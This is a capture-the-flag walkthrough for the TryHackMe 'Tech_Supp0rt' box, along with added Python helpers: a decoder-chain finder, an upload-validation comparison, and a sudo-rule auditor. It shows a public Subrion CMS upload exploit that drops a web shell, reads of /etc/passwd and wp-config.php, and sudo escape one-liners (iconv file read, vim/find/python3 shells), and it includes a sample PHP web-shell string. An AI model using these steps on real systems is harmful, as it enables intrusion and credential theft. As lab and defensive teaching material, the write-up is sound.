THM: Tech_Supp0rt: 1

Nmap
First we scan all TCP ports, with version detection and the default NSE scripts.
# nmap -p- -T4 -sV -sC 10.10.106.60 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-23 05:33 BST
Nmap scan report for 10.10.106.60
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-08-22T23:08:56
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2025-08-23T04:38:58+05:30
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -7h14m54s, deviation: 3h10m30s, median: -5h24m56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.32 seconds
Website
The website only shows the default Apache holding page, so we run a gobuster scan to enumerate directories.
# gobuster dir -u http://10.10.106.60 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.106.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/phpinfo.php (Status: 200) [Size: 94928]
/server-status (Status: 403) [Size: 277]
/test (Status: 301) [Size: 311] [--> http://10.10.106.60/test/]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.106.60/wordpress/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Looking through the results we see that phpinfo.php is the standard PHP info test page; it is worth reading, since it leaks the PHP version, document root, loaded modules and other paths. The test directory is an example scammer site, and the wordpress directory is a WordPress blog with nothing of note on it. A wpscan against it gives some information, but nothing to progress with.
SMB
Now we have a look at the SMB shares. The nmap host scripts authenticated with account_used: guest, so guest access should work. First we list the shares, then we connect as guest with an empty password.
# smbclient -L 10.10.106.60 -U guest
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
# smbclient //10.10.106.60/websvr -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 08:17:38 2021
.. D 0 Sat May 29 08:03:47 2021
enter.txt N 273 Sat May 29 08:17:38 2021
8460484 blocks of size 1024. 5699516 blocks available
Downloading this file gives us another web directory (/subrion) and some credentials.
# cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7s*****************************Ck [cooked with magical formula]
Wordpress creds
|->
When we attempt to visit the subrion directory we get redirected to https://10.0.2.15/subrion/subrion/. That address is not the target, so the CMS is most likely configured with a stale base URL; the redirect itself confirms something is installed there, and we need an entry point that doesn't redirect. We run gobuster again, blacklisting the redirect status codes (301 and 302) with -b so that only directly served files show up.
# gobuster dir -u http://10.10.106.60/subrion/ -w /usr/share/wordlists/dirb/common.txt -b 301,302
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.106.60/subrion/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 301,302
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.swf (Status: 404) [Size: 274]
/favicon.ico (Status: 200) [Size: 1150]
/player.swf (Status: 404) [Size: 274]
/robots.txt (Status: 200) [Size: 142]
/sitemap.xml (Status: 200) [Size: 628]
/swfobject.js (Status: 404) [Size: 274]
/updates (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Subrion
Visiting robots.txt we can see a number of entries.
The interesting one is panel, and going there displays a login page for Subrion CMS.
The password we found earlier didn't work, but the note said it was "cooked with magical formula". Running it through CyberChef's Magic operation, which tries chained decodings and scores the output, gives a valid-looking password.
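CyberChef's Magic operation works by trying decoders one after another and keeping the chains whose output looks like text. The script below is an added example of my own, not part of the writeup, that does the same offline for a few encodings an attacker commonly stacks (base64, base32, hex and base58, which the Python standard library lacks): it tries every ordered chain of up to three decoders and reports the ones that end in printable ASCII. The sample string is constructed inside the script and is not the challenge's password.

```python
import base64
import itertools

# Bitcoin-style base58 alphabet, the default for CyberChef's "From Base58" operation.
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    """Base58-encode bytes; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    pad = len(data) - len(data.lstrip(b"\x00"))
    return (B58_ALPHABET[:1] * pad + bytes(reversed(digits))).decode()


def b58decode(text: str) -> bytes:
    """Inverse of b58encode; raises ValueError on characters outside the alphabet."""
    n = 0
    for ch in text.encode("ascii"):
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("not base58")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


# Each decoder raises on input that is not in its alphabet, which is what prunes
# the search: a chain is abandoned as soon as one stage rejects its input.
DECODERS = {
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base32": lambda s: base64.b32decode(s, casefold=True),
    "base58": lambda s: b58decode(s),
    "hex": lambda s: bytes.fromhex(s),
}


def is_printable(text: str) -> bool:
    """Printable ASCII only, no control characters, and not just whitespace."""
    return bool(text.strip()) and all(32 <= ord(c) < 127 for c in text)


def find_decodings(blob: str, max_depth: int = 3):
    """Try every ordered chain of up to max_depth decoders and return the chains
    that end in printable text as (chain, plaintext) pairs, shortest chains first.
    Intermediate stages that are themselves printable (e.g. the base32 layer) are
    reported too; the analyst picks the one that reads like a password."""
    hits = []
    for depth in range(1, max_depth + 1):
        for chain in itertools.product(DECODERS, repeat=depth):
            current = blob
            try:
                for name in chain:
                    current = DECODERS[name](current).decode("ascii")
            except Exception:
                continue  # some stage rejected its input: not this chain
            if current != blob and is_printable(current):
                hits.append((list(chain), current))
    return hits


# Constructed sample for this example (not the challenge's string): a plaintext
# wrapped in base32 and then base58, the kind of "cooked" value a note might hold.
SAMPLE_PLAINTEXT = "Example-Pass1"
SAMPLE_ENCODED = b58encode(base64.b32encode(SAMPLE_PLAINTEXT.encode()))

if __name__ == "__main__":
    for chain, text in find_decodings(SAMPLE_ENCODED):
        print(" -> ".join(chain), ":", text)
```

The search is deliberately small (4 decoders, depth 3, 84 chains); adding decoders is a one-line change to DECODERS, and the printable-text filter is the only scoring, so expect the odd false positive from base64 happily decoding something that was never base64.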
This credential does work, and we are able to log in to the Subrion CMS admin panel. Once logged in, the version information is displayed.
Using this information we look on exploit-db and find EDB-ID 49876, an authenticated file upload bypass to RCE in Subrion CMS 4.2.1 (CVE-2018-19422). The exploit logs in with our credential, uploads a web shell with a .phar extension (which the upload filter does not block but the server's PHP handler still executes), and gives us a shell as www-data.
# python3 49876.py -u http://10.10.106.60/subrion/panel/ -l admin -p ********
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.106.60/subrion/panel/
[+] Success!
[+] Got CSRF token: WkO33HKVd0U8GOsvKDCG9Lm0biBmxeln475I2cea
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: iwyqpxuzinymrmg
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.106.60/subrion/panel/uploads/iwyqpxuzinymrmg.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
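The bypass the exploit relies on is a classic upload-validation failure: the handler decides by client-supplied filename against a denylist of extensions, so a name it was not told about (.phar) gets through, while the web server's PHP handler still executes it. The following is an added example of my own, not Subrion's code and not the exploit's: a denylist check of that shape next to a hardened one that allowlists extensions, ties each to the magic bytes the content must start with, and stores the file under a random name. The filenames, denylist and content are constructed for the example.

```python
import os
import secrets

# Vulnerable pattern: a denylist of "dangerous" extensions. It misses .phar and
# .phtml, is case-sensitive, and trusts whatever name the client sent.
DENYLIST = {"php", "php3", "php4", "php5"}

# Hardened pattern: an allowlist of extensions, each tied to the magic bytes the
# file content must actually start with.
ALLOWLIST = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def vulnerable_accepts(filename: str) -> bool:
    """The kind of check a .phar upload gets past: only the last extension,
    only against a denylist, only in the case the attacker chose."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in DENYLIST


def hardened_accepts(filename: str, content: bytes):
    """Return (ok, stored_name_or_reason). Every rejection path is explicit."""
    # Drop directory components from either path convention before looking at the name.
    name = os.path.basename(filename.replace("\\", "/"))
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[-1].lower()      # normalise case before comparing
    magic = ALLOWLIST.get(ext)
    if magic is None:
        return False, f"extension .{ext} not allowed"
    if not content.startswith(magic):
        return False, f"content does not look like {ext}"
    # Never store under the client's name: a random name removes any control the
    # attacker has over the final path, and the extension is the vetted one.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: a PHP web shell under three names, and a real-looking PNG.
    shell = b"<?php system($_GET['c']); ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for fname, data in [("shell.php", shell), ("shell.phar", shell),
                        ("shell.PHP", shell), ("avatar.png", shell), ("avatar.PNG", png)]:
        print(f"{fname:12} denylist={vulnerable_accepts(fname)!s:5} "
              f"hardened={hardened_accepts(fname, data)}")
```

The hardened check is still only half the fix: on Debian/Ubuntu the PHP module's Apache configuration maps .phar and .phtml to the PHP handler as well as .php, so the upload directory also needs script execution turned off (for example php_admin_flag engine off in a <Directory> block), so that a validation miss leaves a stored file rather than code execution.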
Looking around the system we find two useful bits of information: a system user (scamsite) in /etc/passwd, and a database password in the WordPress config.
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
...
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
mysql:x:111:119:MySQL Server,,,:/nonexistent:/bin/false
$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );
/** MySQL database username */
define( 'DB_USER', 'support' );
/** MySQL database password */
define( 'DB_PASSWORD', '******************' );
...
...
The database password from wp-config.php turns out to be reused for the scamsite account, so we can log in via SSH.
# ssh scamsite@10.10.106.60
scamsite@10.10.106.60's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
120 packages can be updated.
88 updates are security updates.
Last login: Sat Aug 23 05:46:26 2025 from 10.11.18.78
Privilege escalation
Checking out sudo privileges we see there is an entry.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
Checking GTFOBins we find that iconv under sudo can read any file: converting from a charset to the same charset writes the file unchanged to stdout, and because the rule is NOPASSWD we need no password. So we can simply cat out the root flag.
scamsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
85************************************0b -
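The routine after sudo -l is to check every allowed command against GTFOBins. The script below is an added example of my own (not from the writeup or from GTFOBins) that automates that first pass: it parses sudo -l output into one rule per command, then flags unrestricted rules, wildcards, and binaries with a known sudo escape, iconv's file read from this box among them. The sudo -l output it runs on is constructed for the example and contains more rules than the real box.

```python
import os
import re
import shlex

# Known sudo-to-root primitives for a handful of binaries (the GTFOBins entries
# that turn up in boxes like this one). iconv is the one on this machine.
GTFO = {
    "iconv": "read any file: sudo iconv -f 8859_1 -t 8859_1 /root/root.txt",
    "vim": "shell: sudo vim -c ':!/bin/sh'",
    "find": "shell: sudo find . -exec /bin/sh \\; -quit",
    "less": "shell: sudo less /etc/profile, then !/bin/sh",
    "python3": "shell: sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule line as printed by sudo -l: "(runas) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str):
    """Turn sudo -l output into one dict per command: runas, nopasswd, command.
    Commands are split on commas, which is how sudo prints them (an argument
    containing a literal comma would be split too; rare, and visible in the output)."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(),
                              "nopasswd": "NOPASSWD" in tags,
                              "command": cmd})
    return rules


def assess(rules):
    """Flag rules that hand out root: ALL, binaries with a known escape, wildcards."""
    findings = []
    for r in rules:
        cmd = r["command"]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted: sudo su / sudo -i"))
            continue
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()
        prog = os.path.basename(argv[0]) if argv else ""
        if prog in GTFO:
            findings.append((cmd, GTFO[prog]))
        elif "*" in cmd:
            findings.append((cmd, "wildcard in rule: check for argument injection"))
    return findings


# Constructed sudo -l output for the example; only the iconv line matches this box.
SAMPLE = """\
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/bin/vim, /usr/bin/find
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/tar -czf /tmp/backup.tgz *
"""

if __name__ == "__main__":
    for cmd, note in assess(parse_sudo_l(SAMPLE)):
        print(f"{cmd:45} {note}")
```

The output is a starting point, not a verdict: a flagged binary still has to be checked against the exact rule (arguments pinned in sudoers can close an escape, and a wildcard only matters if you control what it expands to), and the interesting rule on a real box is often one GTFO does not know about yet.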